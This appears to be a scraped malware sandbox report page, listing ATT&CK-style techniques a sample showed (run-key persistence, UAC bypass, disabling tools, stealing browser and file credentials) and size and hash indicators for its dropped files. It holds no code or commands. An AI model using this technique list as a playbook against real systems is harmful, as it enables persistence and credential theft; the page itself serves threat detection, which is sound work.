1Registry Run Keys / Startup Folder
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
2File Deletion
2Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5631b75b8776da37cae5d1a3ed05270a7
SHA167691d0971847d5e8deba374645a5b2d8ec8b835
SHA25668d808d31cf64d005fd3b256b4da95c11bd12ec7ef15edd6377763178800a8af
SHA5126bd4ab0210e079c0888ea24aa012dd1e930c0b3306ea4d9cabb07f33de093d0f509983671db5b3f7efa45ae75a0f21e1862d0c811047a9adb8653a1d46523ffb
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
1KB
MD5963146083fe374ae23a67448d63bc620
SHA12448befee1fb7057308afafdf9265610acbc42b9
SHA256d1e2940cd2225f75a66bb66005945bbae7403bb979212b673d9e188d383ab0ca
SHA5126109ce143104d222d58aedc548793a69bcbb177cc768c831e1176cf69221a7dcbad56e8b5007d2215f41e020b1f9880eb5fc01cc2f934d68c04aa730a7cc7aba
-
Filesize
300B
MD59d6037befe362455e476b64d0c7d5585
SHA13a37bd2556c2d2ca8d12517fcdc01053e5f458ab
SHA256c934266ef6486e12580bf58b9a7efccce610d40783c98bac3c9949c1e5b4e51e
SHA512d94320641e1faefcab53d9c58424604b7f779957f17318aeb68043130ea5dc180886d53dbe53b8ce0097fcf9675922c23c1bae8712ed6047b56a0c7abe15f8bc
-
Filesize
2.3MB
MD55ff517172297d6e66393e20ad0fe4191
SHA10065dbc18aa32a06af362ac8e44e3f4163aef5d8
SHA2560c6e3880040d8f84fc5d05b09da177f7b604296d2ab32c0210df131868ffa30b
SHA5129466cd592ed20bc55d01c6cbb2a4714417e67551b6e11be7483e1eb3f605a2b45bca968e5ab0b299c75e057c4d5367a6b9ce9a0a82b32323b9a8aaf2cfc7a98c
-
Filesize
772KB
MD5b93eb0a48c91a53bda6a1a074a4b431e
SHA1ac693a14c697b1a8ee80318e260e817b8ee2aa86
SHA256ab15a9b27ee2d69a8bc8c8d1f5f40f28cd568f5cbb28d36ed938110203f8d142
SHA512732cb0dcb2b1dac1a7462554c256cec27de243734f79b7f87026e9f5fbae6d5d8a5f14a702d2af0b65897b6abad70a9eff1905dc851ce267d221ddcdd9e640c5
-
Filesize
802KB
MD5ac34ba84a5054cd701efad5dd14645c9
SHA1dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b
SHA256c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e
SHA512df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a
-
Filesize
1.7MB
MD5c44487ce1827ce26ac4699432d15b42a
SHA18434080fad778057a50607364fee8b481f0feef8
SHA2564c83e46a29106afbaf5279029d102b489d958781764289b61ab5b618a4307405
SHA512a0ea698333c21e59b5bc79d79ff39d185a019cede394dbd8b2eb72c4230001685a90098a691c296aeab27db6751eef56c4261cf00f790de2e9e9efc0e7f7c808
-
Filesize
548B
MD5742c2400f2de964d0cce4a8dabadd708
SHA1c452d8d4c3a82af4bc57ca8a76e4407aaf90deca
SHA2562fefb69e4b2310be5e09d329e8cf1bebd1f9e18884c8c2a38af8d7ea46bd5e01
SHA51263a7f1482dc15d558e1a26d1214fcecca14df6db78c88735a67d1a89185c05210edc38b38e3e014dac817df88968aaf47beb40e8298777fbb5308abfe16479e4
-
Filesize
550B
MD551014c0c06acdd80f9ae4469e7d30a9e
SHA1204e6a57c44242fad874377851b13099dfe60176
SHA25689ad2164717bd5f5f93fbb4cebf0efeb473097408fddfc7fc7b924d790514dc5
SHA51279b5e2727cce5cd9f6d2e886f93b22b72ec0ad4a6b9ad47205d7cf283606280665ead729ab3921d7e84409cfc09a94e749a68918130f0172856626f5f7af010c
-
Filesize
84KB
MD53b03324537327811bbbaff4aafa4d75b
SHA11218bd8165a2e0ec56a88b5a8bb4b27e52b564e7
SHA2568cae8a9740d466e17f16481e68de9cbd58265863c3924d66596048edfd87e880
SHA512ba5312e1836bac0bb05b133b2b938be98b28646c8b8fc45804d7f252cd2e1a191667bfa8ba979bf2a07d49053114234b78cca83ef28aecf105d7169a3ec3dc62
-
Filesize
1.7MB
MD5b56a4e1baf2ef1f2ff1da51a0c1efd0d
SHA1551d9e7b280b6bb672edce72bcb1e26cd23f64e6
SHA256fde69844a23403a75cb1985075c162db22b6dedad8f89149a9d346c5c3db9e82
SHA5125c72a19d24bb1832ed8861b829b5cc8b9914ede5ee5212cc6cff4e8af77ec0fa4b9f86f0159239e2388dd73157ef1f17bcb505697cff31fdbf65cccf966fd3fa
-
Filesize
350KB
MD5803df907d936e08fbbd06020c411be93
SHA14aa4b498ae037a2b0479659374a5c3af5f6b8d97
SHA256e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c
SHA5125b9c44b4ed68b632360c66b35442722d2797807c88555c9fde9c176581d410e4f6ed433fabdcd9ee614db458158e6055a9f7f526ebfbc8e7f5f3d388f5de4532
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13.3MB
MD5fbe8278ed88ae6533a37e12491b0a2f8
SHA1aef20cae26be6775c690210c7815ccaf8b18e444
SHA2561bfc5dac8bfc67f610a7cbd5b794850878b26e1ab214a11ed88d597aa1e3f6e5
SHA5123ac3106c10d3fd68788d3df05fe65269f3e7adb8b8229fb6b1cd986f817a40e0c7d54391fd2310b428bc23ea05ad1e9d27542961c756f70ee257cf5e54e995a1
-
Filesize
20KB
MD51f395da2a7e52f34218540f30a4a4dfd
SHA1222caffc4cdd7a64c69fe16fe6ead77850cd3b24
SHA256ce5334cda7e49c72742fb9c45026f5c4313b652e58efaf51fe0ef8bcb0e84e04
SHA5124568b599bff1011bbaafdd114a0098595e584da78c4940b29f3db3104acc95764a6e004fe71befef64ec663b2b3106e5225c75b3b706a1cb803f33dccbc04d07
-
Filesize
32B
MD52254aca6d60fa43684be0dd12e00086e
SHA1c753fbc72cfa9d10f5bbd294f71da7f6aa78c515
SHA2565aa58301a1378c4eccf0913e83daf3ed798dea4c930f87282db88eecad828f9c
SHA51246356a3b305cfd44b4e131fb6e0847636e366195b6801f96f35842f77537b04d944e58f945d32dfcc2d69096896601582420e22df04f2d8c615b5846a31def13
-
Filesize
33KB
MD59a5976ae0b74cfdc36dc038464959f2f
SHA1498f15b609b52992999bba304ce2a1938bca675a
SHA2563af6749fcc82142fd3100312ef49e03df1d3d478a9dbe28afcc3f685ad165876
SHA512c528fe7013b676594d5ed68f9e22c1c18c392a56868cd316b4e6859f86972ee7e47ff7f56cc57378a7f60492e5bb09d88531778d599299408b1f213a951e1ac7
-
Filesize
32KB
MD50d7ce33d45ba9fd301b6f45563adb18d
SHA1ff5f9c1fc8708e6533ded25ef530a97ad8aab551
SHA2561bb05d263b02c61dddac174b1ee5404806c7b63cbb2a58a22d5ce5b974d443ae
SHA512bb3e36282cc7dd9e9c78da223eca4a4afba95fdfd466efdb3d412f3fc2381cddd7dfdffb7fb0bd64cfcd0e47f600f754392caf1516bd129ed6ded5a286097bd2